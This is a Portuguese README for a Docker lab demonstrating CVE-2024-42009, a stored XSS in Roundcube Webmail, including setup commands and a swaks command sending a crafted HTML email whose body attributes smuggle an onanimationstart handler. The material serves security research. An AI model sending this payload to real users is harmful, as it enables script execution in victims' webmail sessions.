
Docker-based proof-of-concept para CVE-2024-42009, um XSS armazenado no Roundcube Webmail. Demonstra a exploração por meio de e-mails HTML elaborados e inclui configuração para um ambiente de laboratório vulnerável.
Este repositório demonstra uma Prova de Conceito (PoC) funcional para CVE-2024-42009, uma vulnerabilidade de Cross-Site Scripting (XSS) armazenado no Roundcube Webmail.
A vulnerabilidade é causada por uma sanitização HTML inadequada seguida de reprocessamento inseguro de atributos, permitindo que atacantes injetem manipuladores de eventos maliciosos por meio de e-mails HTML elaborados.
O Roundcube sanitiza e-mails HTML recebidos, mas posteriormente reprocessa certos atributos (ex.: bgcolor, atributos malformados), levando a:
onanimationstart)Isso permite a execução de JavaScript arbitrário quando uma vítima abre um e-mail malicioso.
git clone https://github.com/ZaidArif47/CVE-2024-42009-PoC.git
cd CVE-2024-42009-PoC
docker compose up -d
⏳ Aguarde ~10–15 segundos para o servidor de e-mail inicializar.
docker exec mailserver setup email add [email protected] 'attacker123'
docker exec mailserver setup email add [email protected] 'victim123'
http://localhost:8080
Credenciais:
Envie o e-mail malicioso usando a ferramenta swaks:
swaks --to [email protected] \
--from [email protected] \
--server localhost:2525 \
--header "Content-Type: text/html; charset=utf-8" \
--header "Subject: CVE-2024-42009 PoC" \
--body '<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(1) foo=bar">Foo</body>'


Atualize para as versões corrigidas:
Este projeto é destinado apenas a fins educacionais e de pesquisa de segurança autorizada. Não utilize contra sistemas sem a devida permissão.